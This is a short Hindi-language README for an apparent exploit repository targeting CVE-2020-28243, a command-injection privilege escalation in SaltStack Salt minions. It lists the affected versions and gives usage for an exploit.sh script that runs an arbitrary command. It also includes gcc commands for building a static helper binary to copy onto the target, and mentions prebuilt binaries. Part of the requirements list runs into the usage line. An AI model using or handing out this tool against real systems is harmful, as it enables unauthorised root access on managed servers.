
CVE-2020-28243 SaltStack Minion में लोकल प्रिविलेज एस्केलेशन एक्सप्लॉइट
SaltStack के Salt में एक कमांड इंजेक्शन कमजोरी, जो मास्टर द्वारा restartcheck कॉल करने पर एक मिनियन पर विशेष रूप से तैयार प्रक्रिया नामों के माध्यम से विशेषाधिकार वृद्धि की अनुमति देती है। पूर्ण विवरण के लिए कृपया यह ब्लॉग पोस्ट देखें।
प्रभावित संस्करण: 2016.3.0rc2 और 3002.2 के बीच के सभी संस्करण
इस एक्सप्लॉइट के काम करने के लिए निम्नलिखित आवश्यक हैं:
restartcheck.restartcheck कॉल करना होगा./exploit.sh -w PATH -c 'COMMAND'
-w PATH writable path (and not blocked by SaltStack)
-c COMMAND command to execute

जब लक्ष्य मशीन पर helper बाइनरी को संकलित करने के लिए gcc उपलब्ध नहीं है, तो आप इसे अपनी मशीन पर संकलित कर सकते हैं और बाइनरी को कॉपी कर सकते हैं।
gcc helper.c -o ./helper -static
# Or for 32 bit:
gcc helper.c -o ./helper -m32 -static
वैकल्पिक रूप से, इस रेपो में स्थैतिक बाइनरी प्रदान की गई हैं जिनका उपयोग आप static फ़ोल्डर में कर सकते हैं।